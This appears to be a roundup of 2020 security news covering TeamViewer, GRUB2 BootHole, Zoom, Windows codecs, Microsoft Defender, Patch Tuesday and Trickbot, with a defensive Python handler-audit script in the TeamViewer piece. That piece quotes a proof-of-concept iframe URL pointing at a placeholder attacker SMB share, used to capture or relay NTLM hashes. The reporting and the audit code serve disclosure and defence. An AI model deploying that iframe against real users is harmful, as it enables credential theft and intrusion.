TeamViewer flaw could be exploited to crack users’ password

A high-risk vulnerability (CVE-2020-13699) in TeamViewer for Windows could be exploited by remote attackers to crack users’ passwords and, consequently, lead to further system exploitation.


About TeamViewer

TeamViewer is an application developed by German company TeamViewer GmbH and is available for Windows, macOS, Linux, Chrome OS, iOS, Android, Windows RT, Windows Phone 8 and BlackBerry operating systems.

It is used primarily for remote access to and control of various types of computer systems and mobile devices, but also offers collaboration and presentation features (e.g., desktop sharing, web conferencing, file transfer, etc.).

Since the advent of COVID-19, enterprise use of the software has increased due to many employees being forced to work from home.

About the vulnerability (CVE-2020-13699)

CVE-2020-13699 is a security weakness arising from an unquoted search path or element – more specifically, it’s due to the application not properly quoting its custom URI handlers – and could be exploited when the system with a vulnerable version of TeamViewer installed visits a maliciously crafted website.

“An attacker could embed a malicious iframe in a website with a crafted URL (iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs') that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” explained Jeffrey Hofmann, a security engineer with Praetorian, who discovered and responsibly disclosed the flaw.

“Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”

As noted before, exploitation of the flaw can be initiated remotely and requires no previous authentication. The flaw seems ideal for targeted watering hole attacks.
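The root cause described above is an unquoted `%1` in a URL-protocol handler command, so whitespace inside the URI is split into extra command-line arguments. The following is an added example (not TeamViewer’s or Praetorian’s code) that audits handler commands in the shape stored under `HKCR\<scheme>\shell\open\command`; the handler strings and the `host.example` URI are constructed samples, and the live registry walk only runs on Windows.

```python
"""Audit Windows URL-protocol handler commands for an unquoted %1 placeholder.

Added example, not code from TeamViewer or Praetorian. Handler command strings
below are constructed samples in the shape of HKCR\<scheme>\shell\open\command.
"""
import re

# Constructed sample handler commands (scheme -> command string).
SAMPLE_HANDLERS = {
    # Unquoted placeholder: whitespace in the URI becomes extra arguments.
    "teamviewer10": r'"C:\Program Files\TeamViewer\TeamViewer.exe" %1',
    # Quoted placeholder: the whole URI reaches the program as one argument.
    "safeproto": r'"C:\Program Files\Example\example.exe" "%1"',
    # Neither the executable path nor the placeholder is quoted.
    "legacyproto": r'C:\Legacy App\legacy.exe --uri %1',
}


def placeholder_is_quoted(command: str) -> bool:
    """Return True when every %1 in the command sits inside double quotes."""
    inside = False
    for i, ch in enumerate(command):
        if ch == '"':
            inside = not inside
        elif command.startswith("%1", i) and not inside:
            return False
    return "%1" in command


def split_windows_args(cmdline: str) -> list:
    """Simplified Windows argument splitting: whitespace separates arguments
    and double quotes group text (backslash-escape rules omitted on purpose)."""
    args = []
    for m in re.finditer(r'"([^"]*)"|(\S+)', cmdline):
        args.append(m.group(2) if m.group(1) is None else m.group(1))
    return args


def expand_handler(command: str, uri: str) -> list:
    """Substitute the URI for %1 as the shell does, then split into argv."""
    return split_windows_args(command.replace("%1", uri))


def audit_handlers(handlers: dict) -> list:
    """Return the schemes whose handler command leaves %1 unquoted."""
    return sorted(s for s, c in handlers.items() if not placeholder_is_quoted(c))


def read_registered_handlers() -> dict:
    """Collect URL-protocol handlers from HKCR on a Windows host; returns {}
    elsewhere. A key with a 'URL Protocol' value registers a URI scheme."""
    try:
        import winreg
    except ImportError:
        return {}
    handlers, i = {}, 0
    while True:
        try:
            name = winreg.EnumKey(winreg.HKEY_CLASSES_ROOT, i)
        except OSError:
            break
        i += 1
        try:
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, name) as key:
                winreg.QueryValueEx(key, "URL Protocol")
                handlers[name] = winreg.QueryValue(key, r"shell\open\command")
        except OSError:
            continue
    return handlers


if __name__ == "__main__":
    # Constructed URI containing spaces, in the shape the advisory describes.
    uri = r"teamviewer10: --play \\host.example\share\file.tvs"
    for scheme, cmd in SAMPLE_HANDLERS.items():
        print(scheme, "->", expand_handler(cmd, uri))
    print("unquoted handlers:", audit_handlers(SAMPLE_HANDLERS))
    live = read_registered_handlers()
    if live:
        print("unquoted handlers on this host:", audit_handlers(live))
```

Running it on a Windows host lists every registered scheme whose command would let a crafted URI inject extra arguments, which is the condition the 15.8.3 fix removes for `teamviewer10:`.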

There is no indication that this vulnerability is being exploited in the wild and no public exploit is currently available.

CIS assesses that the risk of exploitation is high for large and medium government and business entities, medium for small government and business entities, and low for home users.

According to the company, the vulnerability affects TeamViewer versions 8 through 15 (up to 15.8.2) for the Windows platform. Users are advised to upgrade to version 15.8.3 to close the hole.

Bug in widely used bootloader opens Windows, Linux devices to persistent compromise

A vulnerability (CVE-2020-10713) in the widely used GRUB2 bootloader opens most Linux and Windows systems in use today to persistent compromise, Eclypsium researchers have found. The list of affected systems includes servers and workstations, laptops and desktops, and possibly a large number of Linux-based OT and IoT systems.


What’s more, the discovery of this vulnerability has spurred a larger effort to audit the GRUB2 code for flaws and, as a result, seven CVE-numbered flaws and many others without a CVE have been brought to light (and have been or will be fixed).

BootHole (CVE-2020-10713)

CVE-2020-10713, named “BootHole” by the researchers who discovered it, can be used to install persistent and stealthy bootkits or malicious bootloaders that will operate even when the Secure Boot protection mechanism is enabled and functioning.

“The vulnerability affects systems using Secure Boot, even if they are not using GRUB2. Almost all signed versions of GRUB2 are vulnerable, meaning virtually every Linux distribution is affected,” the researchers explained.

“In addition, GRUB2 supports other operating systems, kernels and hypervisors such as Xen. The problem also extends to any Windows device that uses Secure Boot with the standard Microsoft Third Party UEFI Certificate Authority. Thus the majority of laptops, desktops, servers and workstations are affected, as well as network appliances and other special purpose equipment used in industrial, healthcare, financial and other industries. This vulnerability makes these devices susceptible to attackers such as the threat actors recently discovered using malicious UEFI bootloaders.”

The researchers have done a good job explaining in detail the why, where and how of the vulnerability, and so did Kelly Shortridge, the VP of Product Management and Product Strategy at Capsule8. The problem effectively lies in the fact that the GRUB2 configuration file (grub.cfg) is parsed by the signed bootloader without being covered by the Secure Boot signature check, so an attacker who can modify it can make their own malicious code run before the OS is loaded.

The only good news is that the vulnerability can’t be exploited remotely. The attacker must first gain a foothold on the system and escalate privileges to root/admin in order to exploit it. Alternatively, they must have physical access to the target system.

The real danger, according to Shortridge, is if criminals incorporate this vulnerability into a bootkit and license it to bot authors, who would then deploy or sell the bootkit-armed bots.

“This pipeline will not pop out pwnage overnight, so the question becomes whether mitigations can be successfully rolled out before criminals can scale this attack,” she noted.

A complex mitigation process

The main problem is that fixing this flaw on such a great number of systems will be a massive, complex and partly manual undertaking.

“Full mitigation of this issue will require coordinated efforts from a variety of entities: affected open-source projects, Microsoft, and the owners of affected systems, among others,” Eclypsium researchers noted.

“This will include: updates to GRUB2 to address the vulnerability; Linux distributions and other vendors using GRUB2 will need to update their installers, bootloaders, and shims [a small app that contains the vendor’s certificate and code that verifies and runs the GRUB2 bootloader]; new shims will need to be signed by the Microsoft 3rd Party UEFI CA; administrators of affected devices will need to update installed versions of operating systems in the field as well as installer images, including disaster recovery media; and eventually the UEFI revocation list (dbx) needs to be updated in the firmware of each affected system to prevent running this vulnerable code during boot.”

Again, both Eclypsium and Shortridge helpfully explained in detail the whole process and the dangers it holds for organizations. In addition to the complex hoop jumping of the mitigation process, orgs should also be monitoring their systems for threats and ransomware that use vulnerable bootloaders to infect or damage systems.

Eclypsium researchers have provided recommendations and have linked to the various reference materials by Microsoft, Debian, Canonical, Red Hat, HPE, SUSE, VMware and others who need to help users and admins fix the problem.

They’ve also provided PowerShell and bash scripts to help administrators identify certificates revoked by the various OS vendors when they push out security updates for CVE-2020-10713.

Other discovered vulnerabilities

After being notified of the existence of BootHole, Canonical (the company that develops Ubuntu) and others went in search of other security holes in GRUB2. They discovered seven related vulnerabilities, whose mitigations are included in today’s release for Ubuntu and other major Linux distributions.

“Given the difficulty of this kind of ecosystem-wide update/revocation, there is a strong desire to avoid having to do it again six months later,” Eclypsium researchers noted.

“To that end, a large effort — spanning multiple security teams at Oracle, Red Hat, Canonical, VMware, and Debian — using static analysis tools and manual review helped identify and fix dozens of further vulnerabilities and dangerous operations throughout the codebase that do not yet have individual CVEs assigned.”

Zoom zero-day flaw allows code execution on victim’s Windows machine

A zero-day vulnerability in Zoom for Windows may be exploited by an attacker to execute arbitrary code on a victim’s computer. The attack doesn’t trigger a security warning and can be pulled off by getting the victim to perform a typical action such as opening a received document file.


Acros Security, the creators of 0patch, have pushed out a micropatch that will close the security hole until Zoom Video Communications delivers a fix.

About the vulnerability

The vulnerability was discovered by an unnamed researcher and reported to Acros Security, who reported it to Zoom earlier today.

It is present in all supported versions of the Zoom client for Windows, and the 0patch team created a micropatch for all of them (from v5.0.3 up to the latest one, v5.1.2).

The flaw is only exploitable if the client is installed on Windows 7 and older Windows systems, due to a specific system property.

“The flaw is likely also exploitable on Windows Server 2008 R2 and earlier though we didn’t test that; either way, our micropatch will protect you wherever you’re using the Zoom client,” Acros Security CEO Mitja Kolsek told Help Net Security.

“While Microsoft’s official support for Windows 7 has ended this January, there are still millions of home and corporate users out there prolonging its life with Microsoft’s Extended Security Updates or with 0patch,” he noted.

He also says that the flaw can be exploited through several attack scenarios, but they will refrain from publishing more detailed information and the PoC exploit until Zoom fixes the issue or decides not to fix it.

Options available to users

Until Zoom pushes out a fix, the options for users who wish to stay safe are as follows:

  • Temporarily stop using Zoom
  • Update Windows to a newer version
  • Implement the micropatch.

“We were able to quickly create a micropatch that removes the vulnerability in four different places in the [software’s] code,” Kolsek noted. The micropatches are available for free to all 0patch users until a fix is released.

“0patch is designed such that when a vulnerable executable module is replaced by a new version, any micropatches that were made for that vulnerable module automatically stop applying (because the cryptographic hash of the module changes). When Zoom issues an updated Client for Windows and you install it on your computer, our micropatch will become obsolete,” he explained.

“In case this updated Zoom Client does not fix this vulnerability, we’ll port the micropatch and make it available for free as quickly as possible.”

Microsoft fixes two RCE flaws affecting Windows 10 machines

Microsoft has released fixes for two remote code execution (RCE) vulnerabilities in the Microsoft Windows Codecs Library on Windows 10 machines.


The vulnerabilities

Both flaws – CVE-2020-1425 and CVE-2020-1457 – arose because of the way the Microsoft Windows Codecs Library handled objects in memory.

CVE-2020-1425 could allow attackers to obtain information to further compromise the user’s system, and CVE-2020-1457 would allow them to execute arbitrary code, all by tricking users into opening an image file.

“To successfully exploit this vulnerability, an attacker would need to deliver a specially crafted image file, like a JPG or TIFF or PNG, and convince the targeted victim to open the file. Data hidden within the image would then be processed by the image rendering program, executing arbitrary code on the endpoint. This code could be used to install a backdoor, allowing an attacker to modify user credentials, execute more code, or navigate laterally through the corporate network,” Richard Melick, Senior Technical Product Manager, Automox, explained.

The vulnerabilities were discovered by Abdul-Aziz Hariri of Trend Micro’s Zero Day Initiative and they are not being actively exploited in the wild.

Silver linings

What initially seemed like critical out-of-band patches for Windows 10 and Windows Server 2019 systems turned out to be slightly less urgent patches, since the flaws affect only Windows 10 systems and only those users who have installed the optional HEVC or “HEVC from Device Manufacturer” media codecs from Microsoft Store, thus limiting the pool of machines open to attack.

Affected customers also didn’t have to do anything to receive the update, as they were automatically updated by (the consumer) Microsoft Store. Enterprise customers using Store for Business received the update in the same manner.

Microsoft has noted, though, that users who have turned off automatic updating for Microsoft Store apps should check for them with the Microsoft Store App or risk going without them.

Microsoft is adding Linux, Android, and firmware protections to Windows


Microsoft is moving forward with its promise to extend enterprise security protections to non-Windows platforms with the general release of a Linux version and a preview of one for Android. The software maker is also beefing up Windows security protections to scan for malicious firmware.

The Linux and Android moves—detailed in posts published on Tuesday here, here, and here—follow a move last year to ship antivirus protections to macOS. Microsoft disclosed the firmware feature last week.

Premium pricing

All the new protections are available to users of Microsoft Advanced Threat Protection and require Windows 10 Enterprise Edition. Public pricing from Microsoft is either non-existent or difficult to find, but according to this site, costs range from $30 to $72 per machine per year to enterprise customers.

In February, when the Linux preview became available, Microsoft said it included antivirus alerts and “preventive capabilities.” Using a command line, admins can manage user machines, initiate and configure antivirus scans, monitor network events, and manage various threats.

“We are just at the beginning of our Linux journey and we are not stopping here!” Tuesday’s post announcing the Linux general availability said. “We are committed to continuous expansion of our capabilities for Linux and will be bringing you enhancements in the coming months.”

The Android preview, meanwhile, provides several protections, including:

  • The blocking of phishing sites and other high-risk domains and URLs accessed through SMS/text, WhatsApp, email, browsers, and other apps. The features use the same Microsoft Defender SmartScreen services that are already available for Windows so that decisions to block suspicious sites will apply across all devices on a network.
  • Proactive scanning for malicious or potentially unwanted applications and files that may be downloaded to a mobile device.
  • Measures to block access to network resources when devices show signs of being compromised with malicious apps or malware.
  • Integration to the same Microsoft Defender Security Center that’s already available for Windows, macOS, and Linux.

Last week, Microsoft said it had added firmware protection to the premium Microsoft Defender. The new offering scans Unified Extensible Firmware Interface, which is the successor to the traditional BIOS that most computers used during the boot process to locate and enumerate hardware installed.

The firmware scanner uses a new component added to virus protection already built into Defender. Hacks that infect firmware are particularly pernicious because they survive reinstallations of the operating system and other security measures. And because firmware runs before Windows starts, it has the ability to burrow deep into an infected system. Until now, there have been only limited ways to detect such attacks on large fleets of machines.

It makes sense that the extensions to non-Windows platforms are available only to enterprises and cost extra. I was surprised, however, that Microsoft is charging a premium for the firmware protection and only offering it to enterprises. Plenty of journalists, attorneys, and activists are equally if not more threatened by so-called evil maid attacks, in which a housekeeper or other stranger has the ability to tamper with firmware during brief physical access to a computer.

Microsoft has a strong financial incentive to make Windows secure for all users. Company representatives didn’t respond to an email asking if the firmware scanner will become more widely available.

June 2020 Patch Tuesday forecast: Steady as she goes

It’s hard to believe we’re almost halfway through our 2020 Patch Tuesdays already. Working from home has a strange effect on time – each day seems very long, but the weeks are flying by. Regardless, another patch Tuesday is coming next week. May 2020 Patch Tuesday was pretty light on updates as predicted, so I’m expecting we’ll see a more standard release of updates from Microsoft this month.


Windows 10 and Windows Server

One item to factor into your patch Tuesday process is the new release of Windows 10 version 2004 and Windows Server version 2004. These latest versions of Windows 10 were released without major fanfare, as Microsoft pre-announced, on May 27.

Unlike the 1903 to 1909 update, which was done via feature enablement, this is a full, new release. The good news is that the update time has come down significantly from earlier versions such as 1703, which could take up to 90 minutes on average.

For those of you using Windows Update for Business for deployment, there are several enhancements to check out. One of operational importance is the new ability in Intune to identify the target version you want to update to and maintain on all your devices. You can also configure this as a Group Policy or Configuration Service Provider (CSP) policy.

This update also contains enhancements to existing security features in Windows 10. Application Guard, which uses containers, now supports Microsoft Edge on Chromium and can be enabled to enforce protection when Microsoft 365 applications are opened. Microsoft also rolled out more configuration options around their Sandbox feature which was introduced back in version 1903. Windows 10 version 2004 will follow the usual 18-month support model and you can find out more details around the entire set of 2004 features here.

Microsoft announced that starting in May 2020, they are pausing all optional, non-security updates for Windows client and server products (Windows 10, version 1909 down to Windows Server 2008 SP2). They are doing this to relieve the pressure of updating systems while everyone is working remotely. These updates will be included in the regular patch Tuesday releases.

Just a quick reminder: Microsoft also delayed the end-of-support date for the Enterprise and Education versions of Windows 10 1709 to October 13 and the SharePoint 2010 family (SharePoint Foundation 2010, SharePoint Server 2010, and Project Server 2010) to April 13, 2021. Along with this extended timeline comes the need to continue patching these older systems with the latest security updates.

June 2020 Patch Tuesday forecast

  • Expect to see the full set of Microsoft operating system and application updates this month with the exception of .NET updates which were released in May. We didn’t see any of the server updates last month, e.g. SQL, Exchange, etc. so expect at least a few of these.
  • A new set of Extended Security Updates (ESUs) for Windows 7 and Server 2008/2008 R2 should be released along with the standard updates.
  • Servicing stack updates (SSUs) have continued to be released almost monthly and some are mandatory to install before deploying the latest cumulative or security updates. Pay careful attention to the requirements surrounding these in order to prevent problems during your patch cycle.
  • Adobe released a major security update for Acrobat and Reader last month and a minor security release this week. Adobe Flash has not seen a security update for a while, so it could happen.
  • Apple released their security updates for iTunes, iCloud, and the supported operating systems last week.
  • Google released a security update for Chrome 83 this week.
  • Mozilla provided security updates this week for Firefox 77, Firefox ESR 68.9, and Thunderbird 68.9.

June Patch Tuesday will be light on major third-party releases, allowing us to focus on the Microsoft releases. With 2-3 months of managing updates in this strange new world and an expected standard release set from Microsoft, June Patch Tuesday should be steady as she goes.

New propagation module makes Trickbot more stealthy

Trickbot infections of Domain Controller (DC) servers have become more difficult to detect due to a new propagation module that makes the malware run from memory, Palo Alto Networks researchers have found.

That also means that the malware infection can’t survive a shutdown or reboot of the system, but the stealth vs persistence tradeoff is likely to work in the attackers’ favor since servers are rarely shut down or rebooted.

Trickbot’s evolution

Trickbot started as a banking Trojan / information stealer. It was first detected in late 2016 and it’s believed to be the work of the same developers that created the Dyre (aka Dyreza) credential stealer malware.

As predicted at the time, the malware has become a serious threat. Thanks to its modular architecture, the malicious developers have steadily equipped it with additional capabilities, including the ability to disable Microsoft’s built-in antivirus Windows Defender, gather system and account information, send out spam, and spread to other computers on the same network by exploiting SMB vulnerabilities.

Trickbot is also often dropped by Emotet as a secondary payload or is delivered via booby-trapped email attachments, but its lateral propagation mechanism is a big reason why it’s become the bane of many a company’s existence.

A more stealthy mechanism for infecting Domain Controllers

“Trickbot uses modules to perform different functions, and one key function is propagating from an infected Windows client to a vulnerable Domain Controller (DC),” the researchers explained.

Up until April 2020, the malware used three modules for propagation: mshare, tab and mworm.


Since then, the mworm module has been swapped with the nworm module, which:

  • Retrieves an encrypted or encoded malware binary via HTTP traffic (mworm retrieved an unencrypted/unencoded binary)
  • Decodes the binary and runs it in the victim system’s RAM, leaving no discoverable artifacts on an infected DC


As noted before, the in-memory malware can’t survive a system reboot or shutdown, but the creators are betting on DCs being continuously operational for a long while.

The importance of preventing Trickbot infections

We already know that Trickbot developers are constantly working on improving the malware. This is just the latest improvement and evolution step to stay one step ahead of the defenders.

The best way to keep Trickbot infections at bay is to constantly and promptly update and patch Microsoft clients and servers. Patching the SMB vulnerabilities exploited by Trickbot to propagate laterally on the network is essential to preventing constant reinfections.

The malware, on its own, is definitely bad news for enterprises, but Trickbot infections are also likely to be just one small part of a larger attack that will end with ransomware being deployed on many company systems and an even bigger headache for the victim organizations.